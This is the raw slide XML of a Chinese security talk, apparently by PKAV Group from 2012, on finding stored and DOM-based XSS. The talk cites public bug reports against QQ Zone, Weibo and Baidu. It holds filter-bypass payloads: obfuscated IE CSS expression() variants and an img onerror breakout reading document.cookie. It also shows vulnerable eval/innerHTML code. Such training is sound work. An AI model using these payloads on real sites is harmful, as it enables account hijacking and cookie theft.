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6" r:id="rId19"/>
    <p:sldId id="275" r:id="rId20"/>
    <p:sldId id="278" r:id="rId21"/>
    <p:sldId id="273" r:id="rId22"/>
    <p:sldId id="279" r:id="rId23"/>
    <p:sldId id="280" r:id="rId24"/>
    <p:sldId id="274" r:id="rId25"/>
    <p:sldId id="28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418"/>
    <a:srgbClr val="B2CB7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746" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="71" d="100"/>
          <a:sy n="71" d="100"/>
        </p:scale>
        <p:origin x="-1134" y="-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1388-5124-457C-891D-932749DD543F}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2013/3/31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3AAE4-2D85-4B2A-A50A-34DEFC87C3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2013/3/31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2013/3/31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2013/3/31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2013/3/31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2013/3/31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2013/3/31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2013/3/31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2013/3/31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2013/3/31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2013/3/31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77D8-6BE3-4D58-8477-ED9DDC410FE5}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2013/3/31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C77D8-6BE3-4D58-8477-ED9DDC410FE5}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2013/3/31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E1E0-6ADB-43F4-BA20-CD578F7A3F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80" y="1571612"/>
            <a:ext cx="5920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存储</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>的成因及挖掘方法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857356" y="2786058"/>
            <a:ext cx="44001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USERID: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Gainover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (g_@live.com)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GROUP:  PKAV </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Group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Teacher:  GHK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ziwen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12" y="464344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2012-7-28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67425" y="6286520"/>
            <a:ext cx="150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www.pkav.net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5503" y="6286520"/>
            <a:ext cx="19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| www.wooyun.org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2891" y="6286520"/>
            <a:ext cx="2126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| www.toolmao.com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783210" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="4783210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426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CSS-Context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928670"/>
            <a:ext cx="3286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1418" y="3648678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通常情况下，可能会将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;, &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过滤掉了，因而无法使用此方式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418" y="2148480"/>
            <a:ext cx="585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如果未做过滤，可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;/style&gt;&lt;style&gt; … </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>的方式来调用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1418" y="1648414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CSS-Context </a:t>
            </a:r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  <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的利用方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>: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418" y="2719984"/>
            <a:ext cx="47244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1418" y="4791686"/>
            <a:ext cx="40576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51418" y="4148744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直接根据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上下文构造闭合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52012" y="4648810"/>
            <a:ext cx="3520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类型对输出进行严格纠正</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>例如：字体大小，必须为数字，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>图片地址不允许出现非法字符</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="http://www.aiimg.com/pic/png/200901/png_576/aiimg_com_576_liulanqi0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636" y="285728"/>
            <a:ext cx="928694" cy="92869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7572396" y="57148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IE 6, 7, 8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5857892"/>
            <a:ext cx="502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wooyun-2010-05967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 QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>空间存储型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00034" y="6227224"/>
            <a:ext cx="814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wooyun-2010-01101 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>呆子不开口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>网易微博换肤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3" y="6131502"/>
            <a:ext cx="391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dirty="0" smtClean="0"/>
              <a:t>5. http://zone.wooyun.org/content/465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00034" y="285728"/>
            <a:ext cx="4783210" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="4783210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857224" y="285728"/>
              <a:ext cx="4426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CSS-Context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00034" y="857232"/>
            <a:ext cx="746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除了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;style&gt;….&lt;/style&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中可以被写入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数据之外，还有其它位置也可以：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3" y="4078433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 smtClean="0"/>
              <a:t>2. &lt;link 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stylesheet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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data:,*%7bx:expression(if(!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>window.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)%7balert(1);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>window.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=1%7d)%7d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> /&gt;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33" y="4762788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 smtClean="0"/>
              <a:t>3. &lt;style&gt;@import "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data:,*%7bx:expression(if(!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>window.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)%7balert(1);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>window.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=1%7d)%7D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>";&lt;/style&gt;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033" y="1357298"/>
            <a:ext cx="731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&lt;div style="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>width:expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(if(!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){alert(1);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=1})"&gt;&lt;/div&gt;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033" y="5447143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 smtClean="0"/>
              <a:t>4. &lt;div style="font-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>family:foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>expression(if(!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){alert(1);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=1});"&gt;XXX&lt;/div&gt;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033" y="1764654"/>
            <a:ext cx="717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&lt;div style="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>width:ex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(if(!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){alert(1);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=1})"&gt;&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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0033" y="2172010"/>
            <a:ext cx="749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&lt;div style="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>width:ex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/**/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(if(!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){alert(1);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=1})"&gt;&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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00033" y="2579366"/>
            <a:ext cx="735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&lt;div style="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>width:express</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\69</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>on(if(!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){alert(1);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=1})"&gt;&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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00033" y="2986722"/>
            <a:ext cx="735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&lt;div style="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>width:express</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\69</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>on(if(!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){alert(1);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>window.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=1})"&gt;&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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00033" y="3394078"/>
            <a:ext cx="850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 smtClean="0"/>
              <a:t>&lt;div style="w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;#105;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>dth:express</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;#x0069;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>on(if(!w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;#x69;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ndow.x){alert(1);w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;#x069;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ndow.x=1})"&gt;&lt;/div&gt;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57818" y="6143644"/>
            <a:ext cx="180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邮箱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的最爱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10800000">
            <a:off x="4581244" y="6170538"/>
            <a:ext cx="642942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86380" y="326069"/>
            <a:ext cx="293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部分内容参考</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>html5sec.org)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709856" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="4709856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52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Dom-based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071934" y="785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数据输出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3571868" y="1142984"/>
            <a:ext cx="500066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0034" y="1785926"/>
            <a:ext cx="3786214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我是输出 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72066" y="1785926"/>
            <a:ext cx="3786214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="" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>picurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>我是输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>"&gt;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rot="16200000" flipH="1">
            <a:off x="3286116" y="2643182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H="1">
            <a:off x="5143504" y="1142984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>
            <a:off x="5250661" y="2607463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643174" y="3286124"/>
            <a:ext cx="4286280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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>x=$("x").value;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x=$("x").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>getAttribute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picurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>");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643174" y="5143512"/>
            <a:ext cx="4286280" cy="12144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("("+x+")");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$("result").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=x;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="下箭头 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4357686" y="4572008"/>
            <a:ext cx="428628" cy="42862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71472" y="45720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714480" y="4000504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4" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1709925" y="4756674"/>
            <a:ext cx="718935" cy="672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笑脸 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4433327" y="1785926"/>
            <a:ext cx="500066" cy="500066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481" name="Picture 1" descr="C:\Users\ADMINI~1\AppData\Local\Temp\F9$DM2OPK_[95A{T}$N6Y6O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5286388"/>
            <a:ext cx="952500" cy="95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3" name="Picture 1" descr="C:\Users\ADMINI~1\AppData\Local\Temp\F9$DM2OPK_[95A{T}$N6Y6O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3357562"/>
            <a:ext cx="952500" cy="95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709856" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="4709856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52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Dom-based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9843"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="428596" y="1071546"/>
            <a:ext cx="3271835" cy="2609850"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 34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4214810" y="785794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name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>字段是昵称，我们可以自行设置！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4810" y="121442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接着我们做以下测试：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4810" y="1643050"/>
            <a:ext cx="446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Gainover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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Gainover&amp;lt;iframe&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>;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4810" y="2143116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JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>熟悉一点的则可能想到：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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 r="5882"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4286250" y="2571744"/>
            <a:ext cx="4572030" cy="1057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/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5357818" y="3786190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于是，我们测试引号是否被过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>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43570" y="4214818"/>
            <a:ext cx="307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Gainover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>"  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Gainover&amp;quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>;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643834" y="4857760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29586" y="5857892"/>
            <a:ext cx="87716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放弃？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="乘号 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786710" y="4929198"/>
            <a:ext cx="428628" cy="42862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6143636" y="5072074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86380" y="5857892"/>
            <a:ext cx="250466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data=$("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").value;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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 r="5353"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="428596" y="4071942"/>
            <a:ext cx="4714908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398247" y="6417254"/>
            <a:ext cx="488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wooyun-2010-09732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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>百度首页</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>后门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709856" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="4709856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52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Dom-based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28564" y="100010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这一类漏洞经常出现的场景</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>…..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64" y="1571612"/>
            <a:ext cx="496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点击查看大图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>点击播放音乐</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>自动播放音乐。。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64" y="2071678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id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pic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zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>小图地址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bigpic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://xxx.com/1.jpg&amp;quot;&amp;gt;&amp;lt;img </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt;i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> b= 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="test()"&gt;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285749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当用户点击查看大图的时候，执行的代码往往是：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564" y="3286124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function test(){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alert($("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pic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getAttribute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bigpic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>"));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$("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>bigimage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innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>="&lt;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=\""+$("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pic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getAttribute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bigpic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>")+"\"/&gt;";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3071810"/>
            <a:ext cx="2800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箭头连接符 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5072066" y="3429000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034" y="4643446"/>
            <a:ext cx="447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wooyun-2010-02490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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>腾讯微博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00034" y="5131370"/>
            <a:ext cx="535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wooyun-2010-03317 (</a:t>
            </a:r>
